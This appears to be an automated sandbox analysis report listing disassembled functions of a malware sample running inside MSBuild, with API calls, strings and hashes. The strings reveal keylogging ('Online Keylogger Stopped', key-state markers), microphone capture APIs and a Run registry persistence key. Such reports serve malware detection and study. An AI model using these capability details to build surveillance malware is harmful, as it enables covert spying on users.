                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExistsFilePath
                                                                                                                                            • String ID: alarm.wav$xIG
                                                                                                                                            • API String ID: 1174141254-4080756945
                                                                                                                                            • Opcode ID: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
                                                                                                                                            • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                                            • Opcode Fuzzy Hash: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
                                                                                                                                            • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                                            Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                            • String ID: Unknown exception
                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                            • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                            • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                            • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                            • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                            Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                            • String ID: Online Keylogger Stopped
                                                                                                                                            • API String ID: 1623830855-1496645233
                                                                                                                                            • Opcode ID: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                                                                            • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                                            • Opcode Fuzzy Hash: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                                                                            • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                                            Function 0044785D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,1AE85006,00000001,?,0043B995), ref: 004478CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String
                                                                                                                                            • String ID: LCMapStringEx$u;~/
                                                                                                                                            • API String ID: 2568140703-4289478611
                                                                                                                                            • Opcode ID: 36dbacc1f291d1caf6fc4fdd55d35bbab46bd94e6c0c63a945ca64c770c26f8d
                                                                                                                                            • Instruction ID: 749e071dddadb0611b3357a2cf1c840dd35b3db394ad94bf3c266594d1e105ea
                                                                                                                                            • Opcode Fuzzy Hash: 36dbacc1f291d1caf6fc4fdd55d35bbab46bd94e6c0c63a945ca64c770c26f8d
                                                                                                                                            • Instruction Fuzzy Hash: D4012932504209FBDF12AF90DC06EEE7F62EF09755F008165FE0865161C7369971EB99
                                                                                                                                            Function 00447515 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466D0,?,00000000,00401AD8), ref: 00447580
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DateFormat
                                                                                                                                            • String ID: GetDateFormatEx$u;~/
                                                                                                                                            • API String ID: 2793631785-3263374078
                                                                                                                                            • Opcode ID: 5d62f8a1a75e1aabdfa4b9dd35d9b0414c375981d7af8c61118b1623e35876fd
                                                                                                                                            • Instruction ID: 107bc5199d8ee9bd941501caefe4e3e09b7036c662d67d2c93170c31f93f932a
                                                                                                                                            • Opcode Fuzzy Hash: 5d62f8a1a75e1aabdfa4b9dd35d9b0414c375981d7af8c61118b1623e35876fd
                                                                                                                                            • Instruction Fuzzy Hash: 4C015E3254420DFBDF129F90DC06E9E3F62EF08751F004455FD0456161C73A8931EB99
                                                                                                                                            Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • waveInPrepareHeader.WINMM(00F05218,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                            • waveInAddBuffer.WINMM(00F05218,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                                                                            • String ID: T=G
                                                                                                                                            • API String ID: 2315374483-379896819
                                                                                                                                            • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                            • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                            Function 00447657 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466D0,?,00000000,00401AD8), ref: 004476B0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FormatTime
                                                                                                                                            • String ID: GetTimeFormatEx$u;~/
                                                                                                                                            • API String ID: 3606616251-4249145515
                                                                                                                                            • Opcode ID: 3956611c8a71c3b46736b6e6ca5e7506186d9fff0ec06378fabeac1b614756b3
                                                                                                                                            • Instruction ID: 3fcb3ff1dd883ddaf863bb7c07e380bbf4f181685cad0432e832d9f8a01a98f1
                                                                                                                                            • Opcode Fuzzy Hash: 3956611c8a71c3b46736b6e6ca5e7506186d9fff0ec06378fabeac1b614756b3
                                                                                                                                            • Instruction Fuzzy Hash: 07F0C831A0420CFBEF11AF65DC06EAE7F25EF04715F00006AFC0466262CB358921ABDD
                                                                                                                                            Function 004476C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,004503AF,?,00000055,00000050), ref: 00447711
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DefaultUser
                                                                                                                                            • String ID: GetUserDefaultLocaleName$u;~/
                                                                                                                                            • API String ID: 3358694519-1470064895
                                                                                                                                            • Opcode ID: f51004d8d7f432e3b335bc09588288aaebc967ffd78315a85ed6d28db819058c
                                                                                                                                            • Instruction ID: c4de6933aa7e9282c2d26db3fc0b7b8b7f29f17085e7c1fb0c181cc3595b3be3
                                                                                                                                            • Opcode Fuzzy Hash: f51004d8d7f432e3b335bc09588288aaebc967ffd78315a85ed6d28db819058c
                                                                                                                                            • Instruction Fuzzy Hash: 0CF02430A04208B7DB11AF61DC02E9E7F64EF04711F404066FC045A272CB799E119BCD
                                                                                                                                            Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog
                                                                                                                                            • String ID: T=G$T=G
                                                                                                                                            • API String ID: 3519838083-3732185208
                                                                                                                                            • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                            • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                                            • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                            • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                                                            Function 00442686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _abort
                                                                                                                                            • String ID: u;~$u;~/
                                                                                                                                            • API String ID: 1888311480-2138281631
                                                                                                                                            • Opcode ID: 0ab663aabe5c41df582e4c47645a97e73dd3a553072dbf54e942a0c5fdfaaca6
                                                                                                                                            • Instruction ID: b90d4d5e449150af2a70b4dce098d8e40181ff3ffdfca661e457813227e6f640
                                                                                                                                            • Opcode Fuzzy Hash: 0ab663aabe5c41df582e4c47645a97e73dd3a553072dbf54e942a0c5fdfaaca6
                                                                                                                                            • Instruction Fuzzy Hash: F1F0B432D11305DBDB14FF76ED06B1D37A19B00B25F21456AE4089B2E3DB74A881865E
                                                                                                                                            Function 0044772E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044AC56,-00000020,00000FA0,00000000,00466608,00466608,00000000), ref: 00447779
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                            • String ID: InitializeCriticalSectionEx$u;~/
                                                                                                                                            • API String ID: 2593887523-4197256090
                                                                                                                                            • Opcode ID: 9f5a7984421e604b5ed8c94f461c8afd071bb0bca78cc8af36d0c10864a520f0
                                                                                                                                            • Instruction ID: f6b50553e1d3dd0462d8356f048064d45bc8ee5fbdc9d8762f4c05423acd684c
                                                                                                                                            • Opcode Fuzzy Hash: 9f5a7984421e604b5ed8c94f461c8afd071bb0bca78cc8af36d0c10864a520f0
                                                                                                                                            • Instruction Fuzzy Hash: A0F0B431A4420DFBCB155F65EC05E9E7F61DF04722B0040BAFC0856261CB39AE11D69D
                                                                                                                                            Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                                                            • API String ID: 2738857842-2658077756
                                                                                                                                            • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                            • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                            Function 004473BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Alloc
                                                                                                                                            • String ID: FlsAlloc$u;~/
                                                                                                                                            • API String ID: 2773662609-3350286328
                                                                                                                                            • Opcode ID: 2db8a698361bcf016b5b57fe13c06012e15bde99a7e9bc707b8f10b5e3e45f27
                                                                                                                                            • Instruction ID: 24f66c7253cb77c9f437760898e342ee7dcb6335a46030aa2dd544025cc123c2
                                                                                                                                            • Opcode Fuzzy Hash: 2db8a698361bcf016b5b57fe13c06012e15bde99a7e9bc707b8f10b5e3e45f27
                                                                                                                                            • Instruction Fuzzy Hash: B8E05530A8420AA7D214AF20AC03A2EFB54CF04762F0005AAFC0493342CE388E01D1DE
                                                                                                                                            Function 00447410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Free
                                                                                                                                            • String ID: FlsFree$u;~/
                                                                                                                                            • API String ID: 3978063606-1396784693
                                                                                                                                            • Opcode ID: 62d43d67a10ceb863202033ef92c99af1daee8678d202b8b688647115ccc3df7
                                                                                                                                            • Instruction ID: 7735eda0010a26759507aa5f10490f8ec8c905a22dac2ca951c33145abc56605
                                                                                                                                            • Opcode Fuzzy Hash: 62d43d67a10ceb863202033ef92c99af1daee8678d202b8b688647115ccc3df7
                                                                                                                                            • Instruction Fuzzy Hash: D1E0E531A45218A7D720AF25AC02E3EBF94DF44B12F1001AAFD0597252CE355E0196DE
                                                                                                                                            Function 00447601 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,004395D7), ref: 00447640
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$FileSystem
                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime$u;~/
                                                                                                                                            • API String ID: 2086374402-2341449687
                                                                                                                                            • Opcode ID: 19155e5de694f0b636fed2830c1552735b72ebcda65ae3136b4addfb9e5e708b
                                                                                                                                            • Instruction ID: 93e267b14f3539efa22cf49968ab422456f43bf7ede497bc1fb1296ec8be01e3
                                                                                                                                            • Opcode Fuzzy Hash: 19155e5de694f0b636fed2830c1552735b72ebcda65ae3136b4addfb9e5e708b
                                                                                                                                            • Instruction Fuzzy Hash: 2EE0E531A46218A79320AF25AC03E3FBB54DF04B22F1102BAFC0597253CE254D019ADE
                                                                                                                                            Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00448825
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                                                            • String ID: `@$`@
                                                                                                                                            • API String ID: 1353095263-20545824
                                                                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                            • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                            • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                                            Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State
                                                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                                                            • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                            • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                            Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                            Strings
                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteOpenValue
                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                            • API String ID: 2654517830-1051519024
                                                                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
